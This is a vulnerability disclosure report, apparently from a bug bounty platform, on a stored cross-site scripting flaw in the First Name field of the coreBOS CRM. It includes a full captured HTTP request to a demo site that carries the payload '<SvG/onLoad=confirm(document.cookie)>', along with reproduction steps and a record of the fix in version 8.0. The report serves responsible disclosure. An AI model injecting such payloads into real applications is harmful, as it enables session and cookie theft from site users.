Cross-site Scripting (XSS) - Stored in tsolucio/corebos

Valid

Reported on

Nov 24th 2021


Description

It's possible to inject the script on the field: First Name Which is permanently stored. It'll trigger each time refreshing or copying to the new tab.

Proof of Concept

POST /index.php HTTP/2
Host: demo.corebos.com
Cookie: democoreboscom=2fadf4643e2c92731a5bea4397b2d08b; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=035910400380413154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------22977831897677814942874509993
Content-Length: 6178
Referer: https://demo.corebos.com/index.php?module=Leads&action=EditView&record=4196&return_module=Leads&return_action=index&return_viewname=1
Origin: https://demo.corebos.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Gpc: 1
Te: trailers
Connection: close

-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="__vt5rftk"

sid:f19ba3154fc33c9b5c2af7e08003c98a45be79ef,1637780025
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="MAX_FILE_SIZE"

3000000
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="campaignid"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="pagenumber"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="module"

Leads
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="record"

4196
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="mode"

edit
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="action"

Save
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="saverepeat"

0
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="return_module"

Leads
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="return_id"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="return_action"

index
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="return_viewname"

1
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="createmode"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="cbcustominfo1"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="cbcustominfo2"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="Module_Popup_Edit"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="Module_Popup_Save"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="Module_Popup_Save_Param"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="FILTERFIELDSMAP"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="search_url"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="salutationtype"

Mr.
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="firstname"

<SvG/onLoad=confirm(document.cookie)>
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="lead_no"

LEA28
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="lastname"

k
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="phone"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="company"

l
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="mobile"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="designation"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="fax"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="leadsource"

--None--
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="email"

xavin@gmail.com
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="industry"

--None--
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="website"

g
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="annualrevenue"

1,00
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="leadstatus"

--None--
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="noofemployees"

1
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="rating"

--None--
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="secondaryemail"

xavin2@gmail.com
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="assigntype"

T
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="assigned_user_id"

1
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="assigned_group_id"

3
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="emailoptout"

on
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="cf_1181"

Value 1
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="lane"

322 New Horizon Blvd
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="pobox"


-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="code"

53207
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="city"

Milwaukee
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="country"

USA
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="state"

WI
-----------------------------22977831897677814942874509993
Content-Disposition: form-data; name="description"


-----------------------------22977831897677814942874509993--

Step to Reproduce

1. Go to: https://demo.corebos.com/index.php?module=Leads&action=EditView&record=4196&return_module=Leads&return_action=index&return_viewname=1 


2. Save the First Name (payload)as: <SvG/onLoad=confirm(document.cookie)> 


3. Done (XSS Triggered)

Impact

Stored XSS

The user’s browser has no way to know the script should not be trusted, so it will execute the script and because the browser thinks the script came from a trusted source, aka your website, a malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with your site. These scripts can even rewrite the content of the HTML page.

We are processing your report and will contact the tsolucio/corebos team within 24 hours. a year ago
Kiran PP
a year ago

Researcher


PoC-II

https://drive.google.com/drive/u/0/folders/1tZoV8TDPGvdKIKfTFcd9rFSiTSnpOQfr

We have contacted a member of the tsolucio/corebos team and are waiting to hear back a year ago
Joe Bordes validated this vulnerability a year ago
Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes marked this as fixed in 8.0 with commit c42f09 a year ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation